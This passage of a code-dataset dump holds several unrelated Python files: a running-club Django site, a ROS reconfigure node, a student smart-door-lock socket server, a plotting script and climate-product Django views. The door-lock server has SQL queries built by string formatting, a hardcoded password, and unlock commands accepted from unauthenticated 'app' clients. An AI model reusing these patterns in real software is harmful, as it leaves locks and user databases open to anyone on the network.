'results'\nMAP = 'map'\n\nSITE_CONTENT = (\n (CONTACTS, 'Контакти'),\n (STATE, 'ЛД: Положення'),\n (REGISTRATION, 'ЛД: Реєстрація'),\n (RESULTS, 'ЛД: Результати'),\n (MAP, 'ЛД: Траса'),\n)\n\nMEN_CATEGORIES = ('M18', 'M30', 'M40', 'M50', 'M60', 'M70')\nWOMEN_CATEGORIES = ('W18', 'W30', 'W40', 'W50', 'W60', 'W70')\n\nAGES_CATEGORIES_DICT = {\n MEN_CATEGORIES[0]: \"Ч 18-29\",\n MEN_CATEGORIES[1]: \"Ч 30-39\",\n MEN_CATEGORIES[2]: \"Ч 40-49\",\n MEN_CATEGORIES[3]: \"Ч 50-59\",\n MEN_CATEGORIES[4]: \"Ч 60-69\",\n MEN_CATEGORIES[5]: \"Ч 70 і старше\",\n WOMEN_CATEGORIES[0]: \"Ж 18-29\",\n WOMEN_CATEGORIES[1]: \"Ж 30-39\",\n WOMEN_CATEGORIES[2]: \"Ж 40-49\",\n WOMEN_CATEGORIES[3]: \"Ж 50-59\",\n WOMEN_CATEGORIES[4]: \"Ж 60-69\",\n WOMEN_CATEGORIES[5]: \"Ж 70 і старше\",\n}\n\nAGES_CATEGORIES = {\n (MEN_CATEGORIES[0], \"Ч 18-29\"),\n (MEN_CATEGORIES[1], \"Ч 30-39\"),\n (MEN_CATEGORIES[2], \"Ч 40-49\"),\n (MEN_CATEGORIES[3], \"Ч 50-59\"),\n (MEN_CATEGORIES[4], \"Ч 60-69\"),\n (MEN_CATEGORIES[5], \"Ч 70 і старше\"),\n (WOMEN_CATEGORIES[0], \"Ж 18-29\"),\n (WOMEN_CATEGORIES[1], \"Ж 30-39\"),\n (WOMEN_CATEGORIES[2], \"Ж 40-49\"),\n (WOMEN_CATEGORIES[3], \"Ж 50-59\"),\n (WOMEN_CATEGORIES[4], \"Ж 60-69\"),\n (WOMEN_CATEGORIES[5], \"Ж 70 і старше\"),\n}\n\ndef tuplify(x): return (x,x)\ncurrent_year = datetime.now().year\n\nYEARS = map(tuplify, range(1930, current_year + 1))\n\nclass Post(models.Model):\n title = models.CharField(verbose_name=\"Заголовок\", max_length=100)\n body = models.TextField(verbose_name=\"Зміст\")\n photo = models.ImageField(verbose_name=\"Зображення\", upload_to='photos/posts', blank=True)\n youtube_id = models.CharField(verbose_name=\"Youtube відео ІД\", blank=True, max_length=25, null=True)\n pub_date = models.DateTimeField(verbose_name=\"Дата публікації\")\n\n class Meta:\n ordering = ['-pub_date']\n verbose_name = \"Новина\"\n verbose_name_plural = \"Новини\"\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Saving small image in local disk\"\"\"\n self.pub_date = timezone.now()\n super(Post, self).save()\n if self.photo:\n image = Image.open(self.photo.path)\n image.thumbnail(IMAGE_THUMBNAIL_SIZE, Image.ANTIALIAS)\n image.save(self.photo.path)\n\n def __unicode__(self):\n return self.title\n\nclass Sponsor(models.Model):\n title = models.CharField(verbose_name=\"Назва\", max_length=50)\n photo = models.ImageField(verbose_name=\"Логотип\", upload_to='photos/sponsors', blank=True)\n url = models.URLField(verbose_name=\"Посилання\")\n order = models.IntegerField(verbose_name=\"Порядок\", default=0)\n\n class Meta:\n ordering = ['-order']\n verbose_name = \"Спонсор\\Партнер\"\n verbose_name_plural = \"Спонсори\\Партнери\"\n\n def __unicode__(self):\n return self.title\n\nclass TextInformation(models.Model):\n site = models.CharField(max_length=10, unique=True,\n verbose_name=\"Сторінка\",\n choices=SITE_CONTENT,\n default='contacts')\n body = models.TextField(verbose_name=\"Зміст\")\n\n class Meta:\n verbose_name = \"Текстова інформація для сторінок\"\n verbose_name_plural = \"Текстова інформація для сторінок\"\n\n def __unicode__(self):\n return self.site\n\n\nclass Staff(models.Model):\n name = models.CharField(verbose_name=\"Ім`я\", max_length=100)\n body = models.TextField(verbose_name=\"Біографічна довідка\")\n photo = models.ImageField(verbose_name=\"Фотографія\", upload_to='photos/staff', blank=True)\n order = models.IntegerField(verbose_name=\"Порядок\", default=0)\n\n class Meta:\n ordering = ['-order']\n verbose_name = 
\"Персонал\"\n verbose_name_plural = \"Персонал\"\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n self.pub_date = timezone.now()\n super(Staff, self).save()\n if self.photo:\n image = Image.open(self.photo.path)\n image = ImageOps.fit(image, STAFF_THUMBNAIL_SIZE, Image.ANTIALIAS)\n image.save(self.photo.path)\n\n def __unicode__(self):\n return self.name\n\nclass Runner(models.Model):\n name = models.CharField(verbose_name=\"Ім`я\", max_length=100)\n birth_year = models.IntegerField(verbose_name=\"Рік народження\", max_length=2, choices=YEARS)\n paid = models.BooleanField(verbose_name=\"Внесок оплачено\", default=False)\n city = models.CharField(verbose_name=\"Місто\", default='-', max_length=20)\n age_category = models.CharField(verbose_name=\"Вікова категорія\", default=MEN_CATEGORIES[0], choices=AGES_CATEGORIES, max_length=10)\n result = models.CharField(verbose_name=\"Результат\", max_length=100, blank=True)\n position = models.PositiveSmallIntegerField(verbose_name=\"Місце в ваговій категорії\", default=0, blank=True)\n pub_date = models.DateTimeField(verbose_name=\"Дата реєстрації\")\n\n class Meta:\n ordering = ['pub_date']\n verbose_name = \"Учасник\"\n verbose_name_plural = \"Учасники\"\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n if self.pub_date is None:\n self.pub_date = timezone.now()\n super(Runner, self).save()\n\n def __unicode__(self):\n return self.name","sub_path":"club_ultra/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"397173662","text":"#!/usr/bin/env python\n\nimport rospy\n\nfrom dynamic_reconfigure.server import Server\nfrom arduino_dynamic_reconfigure_proxy.cfg import TeensyConfig\n\n# Import the float array message\nfrom std_msgs.msg import Float32MultiArray\nfrom std_msgs.msg import MultiArrayLayout\nfrom std_msgs.msg import MultiArrayDimension\n\n\n\n\ndef callback(config, level):\n # rospy.loginfo(\"\"\"Reconfigure Request: {Motor_Master_Switch}, {motor_1}, {motor_2}, {motor_3}, {motor_4},\\\n # {Controller_ON_OFF}, {Roll_SetPoint}, {Pitch_SetPoint}, {Yaw_SetPoint}, {Pitch_Kp}, {Pitch_Kd}, {Pitch_Ki},\\\n # {Roll_Kp}, {Roll_Kd}, {Roll_Ki}, {Yaw_Kp}, {Yaw_Kd}, {Yaw_Ki},\"\"\".format(**config))\n # return config\n global pub\n if not rospy.is_shutdown():\n multfloatlayout = MultiArrayLayout([MultiArrayDimension('parameters',18,18)],0)\n multfloat = Float32MultiArray(multfloatlayout, [float(config.Motor_Master_Switch),\\\n config.motor_1,\\\n config.motor_2,\\\n config.motor_3,\\\n config.motor_4,\\\n float(config.Controller_ON_OFF),\\\n config.Roll_SetPoint,\\\n config.Pitch_SetPoint,\\\n config.Yaw_SetPoint,\\\n config.Pitch_Kp,\\\n config.Pitch_Kd,\\\n config.Pitch_Ki,\\\n config.Roll_Kp,\\\n config.Roll_Kd,\\\n config.Roll_Ki,\\\n config.Yaw_Kp,\\\n config.Yaw_Kd,\\\n config.Yaw_Ki])\n # array_float = [1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0]\n rospy.loginfo(multfloat)\n pub.publish(multfloat)\n return config\n\nif __name__ == \"__main__\":\n\n try:\n pub = rospy.Publisher('teensy_dynamic_reconfigure', Float32MultiArray, queue_size=10)\n rospy.init_node(\"arduino_dynamic_reconfigure_proxy\", anonymous = True)\n srv = Server(TeensyConfig, callback)\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n\n srv = Server(TeensyConfig, callback)\n 
rospy.spin()\n","sub_path":"Software/Rpi3 - Linux Processor/Ros nodes/arduino_dynamic_reconfigure_proxy/nodes/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"555769295","text":"# Author: Martin Klamrowski\n# Last modified: 5/12/2018\n\nimport socket, time, sqlite3, logging, sys, threading, datetime\n\n\nclass ApplicationServer():\n \"\"\"\n This class models the behaviour of the server for the You Safe Bolt system. The\n communication protocol is described in the README.\n \n To run the server call run() on it.\n \"\"\" \n \n def __init__(self):\n \"\"\"\n Constructor.\n \n ApplicationServer.__init__() --> ApplicationServer\n \"\"\"\n self.ID = 'S'\n self.num_pics = 0\n self.pics_on_file = []\n \n # a client must provide this password to communicate with the server\n self.identify_password = \"biratkingofcomedy\" \n\n self.cmd_list = []\n self.client_sockets = []\n self.client_addresses = []\n \n # a static ip was set on the phone\n self.app_address = '192.168.0.250'\n self.app_port = 2001\n \n # initialize\n self.init_log()\n self.init_db() \n \n # server setup\n ADDRESS = '192.168.0.21'\n PORT = 8018 \n \n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind((ADDRESS, PORT))\n self.server_socket.listen(10)\n\n \n \n def init_db(self):\n \"\"\"\n Initializes the database for the ApplicationServer.\n - A .db file is created and formatted\n \n ApplicationServer.init_db() --> None\n \"\"\"\n conn = sqlite3.connect(\"server.db\")\n curr = conn.cursor()\n \n try:\n # note: Access_Level ranked low to high; 1 to 3 \n curr.execute('CREATE TABLE Users (Name TEXT, Pass INTEGER, Date_Added TEXT, Access_Level INTEGER, PRIMARY KEY (Pass))')\n \n except sqlite3.OperationalError:\n self.log_it(sys.exc_info(), self.ID) \n\n conn.commit()\n conn.close()\n \n \n \n def init_log(self):\n \"\"\"\n Initializes logging for the ApplicationServer.\n - A log file is opened/created\n - Creates a Logger object\n \n ApplicationServer.init_log() --> None\n \"\"\"\n logging.basicConfig( filename = \"server.log\",\n level = logging.DEBUG,\n format = \"\\%(asctime)s \\%(levelname)s \\%(identifier)s \\%(message)s\\n\"\n ) \n self.log = logging.getLogger() \n self.formatter = logging.Formatter(\"\\%(asctime)s \\%(levelname)s \\%(identifier)s \\%(message)s\\n\") \n\n\n \n def run(self):\n \"\"\"\n Main system loop.\n - DoorLock clients are handled in a new thread\n - New client connections and the app are handled in the main thread\n \n ApplicationServer.run() --> None\n \"\"\"\n print(\"DEBUG: running\")\n print(\"DEBUG: server is listening\")\n \n running = True\n while running:\n \n # listen for new connections\n client_socket, client_address = self.server_socket.accept() \n \n try:\n identify = client_socket.recv(4096)\n\n if identify:\n identify_hdr, identify_msg, identify_sdr = self.parse_packet(identify)\n identifier_type = self.client_type(identify_sdr)\n \n # super high-level security\n if identify_hdr == \"DATA\" and identify_msg == self.identify_password and self.client_type(identify_sdr): \n try: \n # if its a doorlock\n if identifier_type == \"D\":\n threading.Thread(target=self.client_thread, args=(client_socket, client_address, identify_sdr)).start()\n self.client_sockets.append(client_socket)\n self.client_addresses.append(client_address[0])\n \n except:\n 
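# NOTE (editorial sketch, not part of the scraped file): the reconfigure proxy
# above flattens 18 parameters into one Float32MultiArray, so any consumer must
# unpack them positionally in the exact order they were packed. A matching
# subscriber might look like this (node and parameter names are placeholders):
import rospy
from std_msgs.msg import Float32MultiArray

PARAM_NAMES = ['motor_master', 'm1', 'm2', 'm3', 'm4', 'controller_on',
               'roll_sp', 'pitch_sp', 'yaw_sp', 'pitch_kp', 'pitch_kd', 'pitch_ki',
               'roll_kp', 'roll_kd', 'roll_ki', 'yaw_kp', 'yaw_kd', 'yaw_ki']

def on_params(msg):
    params = dict(zip(PARAM_NAMES, msg.data))   # order must match the publisher
    rospy.loginfo('pitch PID: %s %s %s',
                  params['pitch_kp'], params['pitch_kd'], params['pitch_ki'])

if __name__ == '__main__':
    rospy.init_node('teensy_param_listener', anonymous=True)
    rospy.Subscriber('teensy_dynamic_reconfigure', Float32MultiArray, on_params)
    rospy.spin()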
self.log_it(sys.exc_info(), self.ID)\n print(\"DEBUG: could not create thread\")\n \n\n elif identify_sdr == \"M\":\n \"\"\"\n Handling of the mobile app is done here. The app was unable to send an identify so that isn't checked.\n \"\"\"\n print(\"DEBUG: connected to app at {}:{}\".format(client_address[0], client_address[1]))\n \n self.app_address = client_address[0]\n recv_hdr, recv_msg, recv_sdr = identify_hdr, identify_msg, identify_sdr\n \n # command\n if recv_hdr == \"CMD\": \n if recv_msg.startswith(\"LOCK DOOR\"): \n # get ready to lock door\n \n recv_msg, door_number = recv_msg.split('&') \n client_socket.sendall(self.make_packet(\"ACK\", \"LOCK DOOR&\" + door_number))\n \n # add command to client command list\n self.add_command((\"D{}\".format(door_number), self.make_packet(\"CMD\", \"LOCK DOOR\")))\n \n print(\"DEBUG: finished lock\")\n \n \n elif recv_msg.startswith(\"UNLOCK DOOR\"):\n # get ready to unlock door\n \n recv_msg, door_number = recv_msg.split('&')\n client_socket.sendall(self.make_packet(\"ACK\", \"UNLOCK DOOR&\" + door_number))\n \n # add command to client command list\n self.add_command((\"D{}\".format(door_number), self.make_packet(\"CMD\", \"UNLOCK DOOR\")))\n \n print(\"DEBUG: finished unlock\")\n \n\n elif recv_msg.startswith(\"ADD USER\"):\n # adding user to database\n \n recv_msg, user_data = recv_msg.split('&')\n self.add_db(user_data)\n \n\n elif recv_msg == \"SHUTTING DOWN\":\n # disconnect from app\n \n self.app_address = \"\"\n client_socket.close()\n\n else:\n client_socket.sendall(self.make_packet(\"ERROR\", \"IDENTIFY FAILED\")) \n \n except:\n print(\"DEBUG: could not talk with client\") \n \n self.server_socket.close()\n \n \n \n def client_thread(self, sock, address, ID):\n \"\"\"\n Handles the DoorLock client.\n \"\"\"\n print(\"DEBUG: connected to doorlock at {}:{}\".format(address[0], address[1])) \n sock.sendall(self.make_packet(\"DATA\", \"CONNECTED\"))\n \n # set to non blocking\n sock.setblocking(False)\n \n connected = True\n while connected:\n \n # send a pending command to the DoorLock\n if self.cmd_list:\n for cmd in self.cmd_list:\n if ID in cmd:\n sock.sendall(cmd[1])\n self.cmd_list.remove(cmd)\n break\n\n try:\n recv = sock.recv(4096)\n\n except:\n print(\"DEBUG: receive timed out\")\n \n else:\n if recv: \n recv_hdr, recv_msg, recv_sdr = self.parse_packet(recv)\n\n sock.setblocking(True) \n \n # command\n if recv_hdr == \"CMD\": \n if recv_msg == \"PIN CHECK\":\n # get ready to receive pin\n \n sock.sendall(self.make_packet(\"ACK\", \"PIN CHECK\")) \n \n pin = sock.recv(4096)\n \n if pin:\n pin_hdr, pin_msg, pin_sdr = self.parse_packet(pin)\n \n if pin_hdr == \"DATA\": \n name = self.search_db(int(pin_msg))\n \n if name:\n sock.sendall(self.make_packet(\"DATA\", name))\n \n else:\n sock.sendall(self.make_packet(\"DATA\", \"PIN CHECK FAIL\")) \n \n \n elif recv_msg == \"BUZZ\":\n \"\"\"\n ###INCOMPLETE (app was not able to receive picture)\n Send a notification + picture to the owner's phone\n - the picture is received from the respective doorlock client\n \"\"\"\n \n sock.sendall(self.make_packet(\"ACK\", \"BUZZ\"))\n \n # prepare to receive picture from client \n pic = sock.recv(1024)\n self.num_pics += 1\n pic_file = open(\"{}.png\".format(self.num_pics), 'wb')\n \n # Pi 1 is slow so need a loop to receive picture data\n sock.settimeout(1)\n\n try:\n while pic: \n pic_file.write(bytes(pic))\n pic = sock.recv(1024)\n \n except:\n print(\"DEBUG: picture receive ended, or timed out\")\n \n sock.sendall(self.make_packet(\"DATA\", 
\"PICTURE RECEIVED\"))\n\n self.pics_on_file.append(\"{}.png\".format(self.num_pics))\n pic_file.close()\n\n try:\n # attempt to connect to mobile app\n app_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n app_socket.connect((self.app_address, self.app_port))\n\n except:\n print(\"DEBUG: error, app was not available\")\n\n else:\n pic_file = open(\"{}.png\".format(self.num_pics), 'rb')\n pic_bytes = pic_file.read()\n\n try:\n app_socket.sendall(pic_bytes)\n\n except:\n print(\"DEBUG: error sending picture\")\n \n sock.setblocking(True)\n \n \n elif recv_msg == \"SHUTTING DOWN\":\n # disconnect from client\n \n self.client_sockets.remove(sock)\n self.client_addresses.remove(address[0])\n sock.close() \n print(\"DEBUG: shutting down\")\n connected = False\n \n elif recv_hdr == \"ERROR\":\n self.log_it(recv_msg, ID)\n\n\n##################################################\n # UTILITY FUNCTIONS\n################################################## \n \n def search_db(self, query):\n \"\"\"\n Returns result (name) of database search for given PIN.\n \n ApplicationServer.search_db(pin) --> str\n \"\"\"\n conn = sqlite3.connect(\"server.db\")\n curr = conn.cursor()\n \n curr.execute('SELECT Name FROM Users WHERE Pass = \"{}\" '.format(query))\n \n fetch = str(curr.fetchone())\n print(\"DEBUG: fetched -> {}\".format( fetch ))\n \n fetch = fetch.lstrip(\"('\")\n fetch = fetch.rstrip(\"',)\") \n \n conn.close()\n \n return fetch if fetch != \"None\" else \"\"\n\n\n\n def add_db(self, data):\n \"\"\"\n Adds to the database. User data is a string of the form \"name pin\".\n \n add_db(data) --> None\n \"\"\"\n conn = sqlite3.connect(\"server.db\")\n curr = conn.cursor()\n \n name, pin = data.split(\" \")\n \n try:\n curr.execute('INSERT INTO Users VALUES(\"{}\", {}, \"{}\", 1)'.format(name, pin, datetime.datetime.now()))\n \n except:\n print(\"DEBUG: user already existed\")\n \n conn.commit()\n conn.close()\n \n \n \n def make_packet(self, type, data):\n \"\"\"\n Returns a bytes packet in the form of \"HEADER\\\\x00MSG\\\\x00SENDER\".\n \n ApplicationServer.make_packet(header, msg) --> bytes\n \"\"\" \n return (\"{}\\x00{}\\x00{}\".format(type, data, self.ID)).encode()\n \n \n \n def parse_packet(self, data):\n \"\"\"\n Deconstructs a bytes packet.\n \n ApplicationServer.parse_packet(packet) --> list\n \"\"\"\n return data.decode().split('\\x00')\n\n\n \n def log_it(self, error_info, device):\n \"\"\"\n Logs an error to the log file.\n \n ApplicationServer.log_it(error) --> None\n \"\"\"\n d = {'identifier': '{}'.format(device)}\n self.log.error(self.formatter.formatException(error_info), extra=d)\n \n \n \n def client_type(self, identifier):\n \"\"\"\n Determines client type from the given identifier.\n \n ApplicationServer.client_type(id) --> str\n \"\"\"\n # doorlock\n if identifier.startswith(\"D\"):\n return \"D\"\n \n # app\n elif identifier.startswith(\"M\"):\n return \"M\"\n \n # not a valid id\n else:\n return \"\"\n\n\n \n def add_command(self, cmd):\n \"\"\"\n Add a command packet to the command list.\n \n ApplicationServer.add_command(packet) --> None\n \"\"\" \n for c in self.cmd_list:\n \n if cmd[0] in c:\n self.cmd_list.remove(c)\n self.cmd_list.append(cmd)\n\n return\n \n self.cmd_list.append(cmd) \n \n \n \n\n\n\n##################################################\n # DELETED FUNCTIONS\n##################################################\n \n \"\"\"\n thread method to handle app\n \"\"\"\n def app_thread(self, socket, address, ID):\n print(\"DEBUG: connected to app at 
{}:{}\".format(address[0], address[1]))\n connected = True\n \n socket.sendall(self.make_packet(\"DATA\", \"CONNECTED\"))\n\n while connected:\n recv = socket.recv(4096) \n print(\"DEBUG: \".format(recv)) \n \n if recv_msg.startswith(\"LOCK DOOR\"): \n # $ get ready to lock door\n \n recv_msg, door_number = recv_msg.split('&') \n socket.sendall(self.make_packet(\"ACK\", \"LOCK DOOR&\" + door_number))\n \n \"\"\"\n add to queue?\n \"\"\"\n \n print(\"DEBUG: finished lock\")\n \n \n elif recv_msg.startswith(\"UNLOCK DOOR\"):\n # $ get ready to unlock door\n \n recv_msg, door_number = recv_msg.split('&')\n socket.sendall(self.make_packet(\"ACK\", \"UNLOCK DOOR&\" + door_number))\n \n \"\"\"\n add to queue?\n \"\"\" \n \n print(\"DEBUG: finished unlock\")\n \n \n elif recv_msg == \"SHUTTING DOWN\":\n socket.close()\n connected = False \n \n \n \n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":17276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457544414","text":"import autoarray as aa\nimport autoarray.plot as aplt\n\ngrid_7x7 = aa.grid.uniform(shape_2d=(7, 7), pixel_scales=0.3)\ngrid_3x3 = aa.grid.uniform(shape_2d=(3, 3), pixel_scales=1.0)\nrectangular_grid = aa.grid_rectangular.overlay_grid(grid=grid_3x3, shape_2d=(3, 3))\nrectangular_mapper = aa.mapper(grid=grid_7x7, pixelization_grid=rectangular_grid)\n\naplt.mapper_obj(\n mapper=rectangular_mapper,\n include=aplt.Include(\n inversion_pixelization_grid=True, inversion_grid=True, inversion_border=True\n ),\n image_pixel_indexes=[[(0, 0), (0, 1)], [(1, 2)]],\n source_pixel_indexes=[[0, 1], [2]],\n)\n","sub_path":"test_autoarray/plot/mapper_rectangular/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"303232383","text":"from django.shortcuts import render, redirect, reverse\nfrom .forms import NewProductRequestForm\nfrom oktav.products.product_processing import ProductRequest\nfrom oktav.visualization.vis import createMapColors\nfrom oktav.utils import importObject\nfrom .models import ProductFeature, Widget, Season, Analysis, OutputType, AggregationPeriod\nfrom region.models import Municipality\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\nfrom django.http import FileResponse\nfrom django.views.generic.edit import DeleteView\nfrom django.conf import settings\nfrom django.core.files.storage import File\nimport django\n\nimport json\nimport ast\n\ndefault_colorbar_dict = '{\"color_scale\":\"alfa\",\"minval\":-20,\"maxval\":35,\"step_size\":1,\"bins\":\"None\",\"color_count\":56,\"reverse\":false}'\n\ndef home(request):\n return render(request, 'home.html')\n\ndef requestPOSTFunction(request_post):\n prf = NewProductRequestForm(request_post)\n print(prf.errors)\n #print(request_post)\n if prf.is_valid():\n\n ########## visual settings ##########\n get_colorbar_dict = request_post.get('colorscale_colorbar_dict_extra')\n cscale = default_colorbar_dict if get_colorbar_dict == '' else get_colorbar_dict\n cscale_loaded = json.loads(cscale)\n cscale_loaded['bins'] = None if cscale_loaded['bins'] == 'None' else cscale_loaded['bins']\n\n extended_cscale = createMapColors(\n color_scale = cscale_loaded['color_scale'],\n minval = cscale_loaded['minval'],\n maxval= cscale_loaded['maxval'],\n step_size = cscale_loaded['step_size'],\n bins = cscale_loaded['bins'],\n 
color_count = cscale_loaded['color_count'],\n reverse = cscale_loaded['reverse'])\n\n product_settings = ProductFeature.objects.filter(name=request_post.get('product_type'))[0]\n product_second_param = product_settings.has_second_parameter\n product_extras = ast.literal_eval(product_settings.extra)\n\n visual_settings = {\n 'colorscale': extended_cscale,\n 'figsize_x': product_extras['figsize_x'], 'figsize_y': product_extras['figsize_y'], 'dpi': product_extras['dpi'],\n 'rivers': request_post.get('rivers_extra') == 'on',\n 'municipality_borders': request_post.get('municipality_borders_extra') == 'on',\n 'state_borders': request_post.get('state_borders_extra') == 'on',\n 'country_borders': request_post.get('country_borders_extra') == 'on', \n 'hillshade': request_post.get('hillshade_extra') == 'on',\n 'linediagram_grid': request_post.get('linediagram_grid_extra') == 'on',\n 'smooth': request_post.get('smooth_extra') == 'on',\n 'infobox': request_post.get('infobox_extra') == 'on',\n 'boxplot': request_post.get('boxplot_extra') == 'on',\n 'title': request_post.get('title_extra') == 'on',\n 'secondary_y_axis': request_post.get('secondary_y_axis_extra') == 'on'\n }\n ################################\n\n ########## 2nd parameter ##########\n if product_second_param:\n param = [request_post.get('parameter'), request_post.get('parameter2')]\n else:\n param = request_post.get('parameter')\n ################################\n\n ########## season ##########\n if request_post.get('aggregation_period') == 'YS':\n datum_start = '-01-01'\n datum_end = '-01-01'\n elif request_post.get('aggregation_period') == 'QS-DEC':\n obj = Season.objects.filter(name=request_post.get('season'))[0]\n datum_start = getattr(obj, 'datum_start')\n datum_end = getattr(obj, 'datum_end')\n ################################\n\n\n ########## region ##########\n if request_post.get('region_option') == 'austria': # austria\n region = ['austria']\n else: # bundesland, municipality\n region_a = (request_post.get('region')[0:-2]).split(\",\")\n region = [a.lstrip() for a in region_a]\n\n if request_post.get('region_option') == 'municipality':\n region_list = []\n for i in region:\n region_list.append(str(Municipality.objects.filter(name=i)[0].gkz))\n else:\n region_list = region\n\n ################################\n\n\n ########## height filters ##########\n lhf_from_html = request_post.get('lower_height_filter')\n uhf_from_html = request_post.get('upper_height_filter')\n if uhf_from_html == '0':\n adj_upper_height_filter = None\n if lhf_from_html == '0':\n adj_lower_height_filter = None\n else:\n adj_lower_height_filter = int(lhf_from_html)\n else:\n adj_upper_height_filter = int(uhf_from_html)\n if lhf_from_html == '0':\n adj_lower_height_filter = 0\n else:\n adj_lower_height_filter = int(lhf_from_html)\n ################################\n\n\n ########## reference period ##########\n if 'reference_period_checkbox' in request_post.keys():\n if request_post.get('reference_period_checkbox') != 'on':\n refper = None\n refper_checkbox_for_settings = \"off\"\n else:\n refper_checkbox_for_settings = \"on\"\n refper = [\n request_post.get('reference_period_start')+datum_start,\n request_post.get('reference_period_end')+datum_end\n ]\n else:\n refper_checkbox_for_settings = \"off\"\n refper = None\n ################################\n\n PR = ProductRequest(\n product_type = request_post.get('product_type'),\n parameter = param,\n aggregation_period = request_post.get('aggregation_period'),\n season = request_post.get('season'),\n scenario = 
[request_post.get('scenario')],\n region_option = request_post.get('region_option'),\n region = region_list,\n period = [request_post.get('period_start')+datum_start, request_post.get('period_end')+datum_end],\n reference_period = refper,\n lower_height_filter = adj_lower_height_filter,\n upper_height_filter = adj_upper_height_filter,\n visual_settings = visual_settings,\n output_path = request_post.get('output_path'),\n output_type = request_post.get('output_type'),\n django = True,\n django_path = settings.BASE_DIR + '/media/'\n )\n #print(PR.__dict__)\n product_func = ProductFeature.objects.filter(name = PR.product_type)[0].function\n func = getattr(PR, product_func)\n\n otype = OutputType.objects.filter(name = PR.output_type)[0].otype\n ofilename = PR.outname.split('/')[-1]\n def_filename = settings.MEDIA_ROOT + '/' + ofilename\n\n ################## settings dictionary ##################x\n\n \n if region[0] == 'austria':\n region_list_for_settings = ''\n else:\n region_list_for_settings = (', ').join(region) + ', '\n\n \n if request_post.get('aggregation_period') == 'YS':\n season_for_settings = \"DJF\"\n else:\n season_for_settings = request_post.get('season')\n \n settings_dict = {\n \"id_product_type\": request_post.get('product_type'),\n \"id_scenario\": request_post.get('scenario'),\n \"id_parameter\": request_post.get('parameter'),\n \"id_parameter2\": request_post.get('parameter2'),\n \"id_aggregation_period\": request_post.get('aggregation_period'),\n \"id_season\": season_for_settings,\n \"id_region_option\": request_post.get('region_option'),\n \"id_region\": region_list_for_settings,\n \"id_period_start\": request_post.get('period_start'),\n \"id_period_end\": request_post.get('period_end'),\n \"id_reference_period_checkbox\": refper_checkbox_for_settings,\n \"id_reference_period_start\": request_post.get('reference_period_start'),\n \"id_reference_period_end\": request_post.get('reference_period_end'),\n \"id_lower_height_filter\": request_post.get('lower_height_filter'),\n \"id_upper_height_filter\": request_post.get('upper_height_filter'),\n \"id_output_type\": request_post.get('output_type'),\n \"id_output_path\": request_post.get('output_path'),\n \"id_colorscale_colorbar_dict_extra\": request_post.get('colorscale_colorbar_dict_extra'),\n \"id_colorscale_name_extra\": cscale_loaded['color_scale'],\n \"id_colorscale_minval_extra\": cscale_loaded['minval'],\n \"id_colorscale_step_size_extra\": cscale_loaded['step_size'],\n \"id_colorscale_reverse_extra\": cscale_loaded['reverse'],\n \"id_rivers_extra\": request_post.get('rivers_extra'),\n \"id_municipality_borders_extra\": request_post.get('municipality_borders_extra'),\n \"id_state_borders_extra\": request_post.get('state_borders_extra'),\n \"id_country_borders_extra\": request_post.get('country_borders_extra'),\n \"id_hillshade_extra\": request_post.get('hillshade_extra'),\n \"id_linediagram_grid_extra\": request_post.get('linediagram_grid_extra'),\n \"id_smooth_extra\": request_post.get('smooth_extra'),\n \"id_infobox_extra\": request_post.get('infobox_extra'),\n \"id_boxplot_extra\": request_post.get('boxplot_extra'),\n \"id_title_extra\": request_post.get('title_extra'),\n \"id_secondary_y_axis_extra\": request_post.get('secondary_y_axis_extra')\n }\n\n\n analysis = Analysis(content_type = otype, filename = ofilename, analysis_details = PR, settings_json = json.dumps(settings_dict))\n func()\n \n analysis.file.save(def_filename, File(open(def_filename, 'rb')))\n analysis.file.name = ofilename\n analysis.save()\n \n 
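# NOTE (editorial sketch, not part of the scraped file): the view above falls back
# to default_colorbar_dict when the form posts an empty colour-bar field, then
# patches the string 'None' back into a real None. That parsing step is easy to
# isolate and test; this helper assumes the module-level default defined above.
import json

def parse_colorbar(raw, default=default_colorbar_dict):
    cfg = json.loads(raw or default)    # '' and None both fall back to the default
    if cfg.get('bins') == 'None':
        cfg['bins'] = None              # the form serializes None as the string 'None'
    return cfg

assert parse_colorbar('')['color_scale'] == 'alfa'
assert parse_colorbar('{"bins": "None"}')['bins'] is None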
#print(request.POST)\n return analysis.id\n\n\ndef product_request(request):\n if request.method == 'POST':\n id = requestPOSTFunction(request_post = request.POST)\n return HttpResponseRedirect(reverse('analysis_result', args=(id,)))\n else:\n prf = NewProductRequestForm()\n return render(request, 'products.html', {'product_form': prf})\n\ndef product_request_refine(request, pk):\n if request.method == 'POST':\n id = requestPOSTFunction(request_post = request.POST)\n return HttpResponseRedirect(reverse('analysis_result', args=(id,)))\n else:\n prf = NewProductRequestForm()\n return render(request, 'products.html', {'product_form': prf, 'analysis_id': pk})\n\ndef analysis_result(request, pk):\n analysis = get_object_or_404(Analysis, pk = pk)\n return render(request, 'analysis_result.html', {'analysis': analysis})\n\n\nclass AnalysisDeleteView(DeleteView):\n model = Analysis\n template_name=\"analysis_confirm_delete.html\"\n\n def get_success_url(self):\n return reverse('index')\n\ndef index(request):\n return render(request, 'index.html')\n\ndef fetch_product_features(request):\n if request.is_ajax():\n q = request.GET.get('product_name', '')\n field = request.GET.get('field', 